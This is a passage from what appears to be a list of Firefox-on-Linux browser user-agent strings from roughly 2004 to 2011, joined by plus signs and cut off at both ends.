Firefox/1.0.1 (Debian package 1.0.1-2) +Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.6) Gecko/20050322 Firefox/1.0.1 +Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.9.2.8) Gecko/20100725 Gentoo Firefox/3.6.8 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.11) Gecko/20070327 Ubuntu/dapper-security Firefox/1.5.0.11 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.12) Gecko/20070719 CentOS/1.5.0.12-3.el5.centos Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.3) Gecko/20060425 SUSE/1.5.0.3-7 Firefox/1.5.0.3 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.6) Gecko/20060808 Fedora/1.5.0.6-2.fc5 Firefox/1.5.0.6 pango-text +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.8) Gecko/20060911 SUSE/1.5.0.8-0.2 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.8) Gecko/20061115 Ubuntu/dapper-security Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.10) Gecko/20071126 Ubuntu/7.10 (gutsy) Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.14) Gecko/20080410 SUSE/2.0.0.14-0.1 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.14) Gecko/20080418 Ubuntu/7.10 (gutsy) Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.16) Gecko/20080718 Ubuntu/8.04 (hardy) Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.19) Gecko/20081213 SUSE/2.0.0.19-0.1 Firefox/2.0.0.19 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.1) Gecko/20061205 Firefox/2.0.0.1 (Debian-2.0.0.1+dfsg-2) +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.1) Gecko/20061220 Firefox/2.0.0.1 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.22pre) Gecko/20090327 Ubuntu/7.10 (gutsy) Firefox/2.0.0.22pre +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.5) Gecko/20060911 SUSE/2.0.0.5-1.2 Firefox/2.0.0.5 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.11) Gecko/2009062218 Gentoo Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.12) Gecko/2009070812 Ubuntu/8.04 (hardy) Firefox/3.0.12 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.14) Gecko/2009082505 Red Hat/3.0.14-1.el5_4 Firefox/3.0.14 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.18) Gecko/2010020400 SUSE/3.0.18-0.1.1 Firefox/3.0.18 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.18) Gecko/2010021501 Firefox/3.0.18 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009041500 SUSE/3.0.9-2.2 Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.04 (hardy) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 Firefox/3.5.1 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090722 Gentoo Firefox/3.5.1 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB7.0 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Ubuntu/8.04 (hardy) Firefox/3.5 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100914 SUSE/3.6.10-0.3.1 Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.10 (karmic) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc13 Firefox/3.6.12 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.13) Gecko/20101209 CentOS/3.6-2.el5.centos Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.15) Gecko/20110330 CentOS/3.6-1.el5.centos Firefox/3.6.15 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.18) Gecko/20110615 Ubuntu/10.10 (maverick) Firefox/3.6.18 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.10 (maverick) Firefox/3.6.18 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.21) Gecko/20110830 Ubuntu/10.10 (maverick) Firefox/3.6.21 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5 +Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5 +Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.7.13) Gecko/20060418 Fedora/1.0.8-1.1.fc4 Firefox/1.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.7.6) Gecko/20050405 Firefox/1.0 (Ubuntu package 1.0.2) +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.0.12) Gecko/20070718 Fedora/1.5.0.12-4.fc6 Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.0.6) Gecko/20060808 Fedora/1.5.0.6-2.fc5 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.10) Gecko/20071126 Ubuntu/7.10 (gutsy) Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.12) Gecko/20080203 SUSE/2.0.0.12-2.1 Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.16) Gecko/20080715 Ubuntu/7.10 (gutsy) Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.1) Gecko/20061208 Firefox/2.0.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.2pre) Gecko/20061023 Firefox/2.0.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.6) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.8) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1.9) Gecko/20071105 Firefox/2.0.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.10) Gecko/2009042513 Ubuntu/8.04 (hardy) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 GTB5 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.11) Gecko/2009060309 Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.13) Gecko/2009080316 Ubuntu/8.04 (hardy) Firefox/3.0.13 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.18) Gecko/2010021501 Ubuntu/9.04 (jaunty) Firefox/3.0.18 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.19) Gecko/2010040118 Ubuntu/8.10 (intrepid) Firefox/3.0.19 GTB7.1 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.15) Gecko/20101027 Fedora/3.5.15-1.fc12 Firefox/3.5.15 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB6 +Mozilla/5.0 (X11;U; Linux i686; en-GB; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.11) Gecko/20101013 Ubuntu/10.10 (maverick) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12 GTB7.1 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.10 (maverick) Firefox/3.6.18 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5 +Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:2.0) Gecko/20110404 Fedora/16-dev Firefox/4.0 +Mozilla/5.0 (X11; U; Linux i686; en; rv:1.8.1.11) Gecko/20071216 Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux i686; en; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; Linux i686; en; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040225 Firefox/0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050715 Firefox/1.0.6 SUSE/1.0.6-16 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050719 Red Hat/1.0.6-1.4.1 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050720 Fedora/1.0.6-1.1.fc3 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050720 Fedora/1.0.6-1.1.fc4.k12ltsp.4.4.0 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050721 Firefox/1.0.6 (Ubuntu package 1.0.6) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050811 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050815 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050911 Firefox/1.0.6 (Debian package 1.0.6-5) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050918 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050920 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050921 Firefox/1.5.0.2 Mandriva/1.0.6-15mdk (2006.0) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20051106 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20051111 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20060410 Firefox/1.0.8 Mandriva/1.0.6-16.5.20060mdk (2006.0) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20060927 Firefox/1.0.4 (Debian package 1.0.4-2sarge12) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20061113 Firefox/1.0.4 (Debian package 1.0.4-2sarge13) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20070116 Firefox/1.0.4 (Debian package 1.0.4-2sarge15) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20070530 Firefox/1.0.4 (Debian package 1.0.4-2sarge17) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.4 (Ubuntu package 1.0.7) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060411 Firefox/1.0.8 SUSE/1.0.8-0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060413 Red Hat/1.0.8-1.4.1 Firefox/1.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041117 Firefox/1.0 (Debian package 1.0-2.0.0.45.linspire0.4) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041204 Firefox/1.0 (Debian package 1.0.x.2-1) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041215 Firefox/1.0 Red Hat/1.0-12.EL4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041218 Firefox/1.0 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20050210 Firefox/1.0 (Debian package 1.0+dfsg.1-6) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20050221 Firefox/1.0 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20050814 Firefox/1.0 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050310 Firefox/1.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050311 Firefox/1.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050405 Firefox/1.0 (Ubuntu package 1.0.2) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) Gecko/20050421 Firefox/1.0.3 (Debian package 1.0.3-2) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 SUSE/1.0.4-1.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050512 Firefox/1.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050513 Fedora/1.0.4-1.3.1 Firefox/1.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050513 Firefox/1.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050523 Firefox/1.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050524 Fedora/1.0.4-4 Firefox/1.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050610 Firefox/1.0.4 (Debian package 1.0.4-3) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040630 Firefox/0.9.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040802 Firefox/0.9.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040917 Firefox/0.9.3 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20060911 SUSE/1.5.0.10-0.2 Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070221 Red Hat/1.5.0.10-0.1.el4 Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070223 CentOS/1.5.0.10-0.1.el4.centos Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070226 Fedora/1.5.0.10-1.fc6 Firefox/1.5.0.10 pango-text +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070226 Red Hat/1.5.0.10-0.1.el4 Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070302 Ubuntu/dapper-security Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070409 CentOS/1.5.0.10-2.el5.centos Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.10) Gecko/20070510 Fedora/1.5.0.10-6.fc6 Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070529 Red Hat/1.5.0.12-0.1.el4 Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070530 Fedora/1.5.0.12-1.fc6 Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070719 CentOS/1.5.0.12-0.3.el4.centos Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20071126 Fedora/1.5.0.12-7.fc6 Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.13pre) Gecko/20080207 Ubuntu/dapper-security Firefox/1.5.0.13pre +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060313 Debian/1.5.dfsg+1.5.0.1-4 Firefox/1.5.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060313 Fedora/1.5.0.1-9 Firefox/1.5.0.1 pango-text +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060324 Ubuntu/dapper Firefox/1.5.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060404 Firefox/1.5.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.2) Gecko/20060419 Fedora/1.5.0.2-1.2.fc5 Firefox/1.5.0.2 pango-text +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.2) Gecko Firefox/1.5.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060326 Firefox/1.5.0.3 (Debian-1.5.dfsg+1.5.0.3-2) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060425 SUSE/1.5.0.3-7 Firefox/1.5.0.3 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060504 Fedora/1.5.0.3-1.1.fc5 Firefox/1.5.0.3 pango-text +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060523 Ubuntu/dapper Firefox/1.5.0.3 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060406 Firefox/1.5.0.4 (Debian-1.5.dfsg+1.5.0.4-1) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060527 SUSE/1.5.0.4-1.3 Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060613 Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060614 Fedora/1.5.0.4-1.2.fc5 Firefox/1.5.0.4 pango-text +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060629 Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060704 Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060711 Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060716 Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060801 Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060803 Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060806 Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060812 Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060813 Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060820 Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060831 Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 (Debian-1.5.dfsg+1.5.0.6-1) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 (Debian-1.5.dfsg+1.5.0.6-4) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 SUSE/1.5.0.6-0.1 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060802 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060803 Firefox/1.5.0.6 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060807 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060808 Fedora/1.5.0.6-2.fc5 Firefox/1.5.0.6 pango-text +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060905 Fedora/1.5.0.6-10 Firefox/1.5.0.6 pango-text +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060911 Red Hat/1.5.0.7-0.1.el4 Firefox/1.5.0.1 pango-text +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20061014 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20060802 